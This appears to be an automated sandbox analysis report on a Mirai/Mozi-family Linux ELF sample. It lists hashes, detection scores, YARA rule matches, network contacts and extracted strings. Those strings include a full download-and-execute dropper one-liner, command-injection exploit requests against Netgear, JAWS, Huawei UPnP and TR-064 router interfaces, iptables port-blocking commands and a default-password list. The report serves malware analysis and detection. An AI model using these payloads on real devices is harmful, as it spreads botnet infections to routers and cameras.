Linux Analysis Report
i.elf

Overview

General Information

Sample name: i.elf
Analysis ID: 1649545
MD5: 5c848f8107db295d12efb354b85c374a
SHA1: 6c705ac50fc9285d929768244a97574fe5d618da
SHA256: b496045d5926b04490bf1f9350a6ac30c78e217bbde37960c19397148095dc4f
Tags: elfuser-abuse_ch
Infos:

Detection

Mirai
Score: 100
Range: 0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: i.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: i.elf Virustotal: Detection: 65% Perma Link
Source: i.elf ReversingLabs: Detection: 58%
Found strings indicative of a multi-platform dropper
Source: i.elf String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: i.elf String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: i.elf String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: i.elf String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: i.elf String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: i.elf String found in binary or memory: http://%s:%d/Mozi.m
Source: i.elf String found in binary or memory: http://%s:%d/Mozi.m;
Source: i.elf String found in binary or memory: http://%s:%d/Mozi.m;$
Source: i.elf String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: i.elf String found in binary or memory: http://%s:%d/bin.sh
Source: i.elf String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: i.elf String found in binary or memory: http://127.0.0.1
Source: i.elf String found in binary or memory: http://127.0.0.1sendcmd
Source: i.elf String found in binary or memory: http://HTTP/1.1
Source: i.elf String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: i.elf String found in binary or memory: http://ipinfo.io/ip
Source: i.elf String found in binary or memory: http://purenetworks.com/HNAP1/
Source: i.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: i.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: i.elf String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: i.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: i.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: i.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Source: 6226.1.00007f524c017000.00007f524c058000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
Source: 6226.1.00007f524c017000.00007f524c058000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_77137320 Author: unknown
Source: 6226.1.00007f524c017000.00007f524c058000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Yara signature match
Source: i.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
Source: i.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
Source: i.elf, type: SAMPLE Matched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
Source: 6226.1.00007f524c017000.00007f524c058000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
Source: 6226.1.00007f524c017000.00007f524c058000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
Source: 6226.1.00007f524c017000.00007f524c058000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
Source: classification engine Classification label: mal100.troj.linELF@0/0@0/0
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/i.elf (PID: 6226) Queries kernel information via 'uname': Jump to behavior
Source: i.elf, 6226.1.00005628efb45000.00005628efc51000.rw-.sdmp Binary or memory string: (Vrg.qemu.gdb.arm.sys.regs">
Source: i.elf, 6226.1.00007fff47068000.00007fff47089000.rw-.sdmp Binary or memory string: zx86_64/usr/bin/qemu-arm/tmp/i.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/i.elf
Source: i.elf, 6226.1.00005628efb45000.00005628efc51000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: i.elf, 6226.1.00007fff47068000.00007fff47089000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: i.elf, 6226.1.00005628efb45000.00005628efc51000.rw-.sdmp Binary or memory string: rg.qemu.gdb.arm.sys.regs">
Source: i.elf, 6226.1.00005628efb45000.00005628efc51000.rw-.sdmp Binary or memory string: (V!/etc/qemu-binfmt/arm

Stealing of Sensitive Information
barindex
Yara detected Mirai
Source: Yara match File source: i.elf, type: SAMPLE
Source: Yara match File source: 6226.1.00007f524c017000.00007f524c058000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6226.1.00007f524c060000.00007f524c06a000.rw-.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: i.elf PID: 6226, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mirai
Source: Yara match File source: i.elf, type: SAMPLE
Source: Yara match File source: 6226.1.00007f524c017000.00007f524c058000.r-x.sdmp, type: MEMORY
Source: Yara match File source: 6226.1.00007f524c060000.00007f524c06a000.rw-.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: i.elf PID: 6226, type: MEMORYSTR

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
109.202.202.202
 unknown Switzerland
13030 INIT7CH false
91.189.91.43
 unknown United Kingdom
41231 CANONICAL-ASGB false
91.189.91.42
 unknown United Kingdom
41231 CANONICAL-ASGB false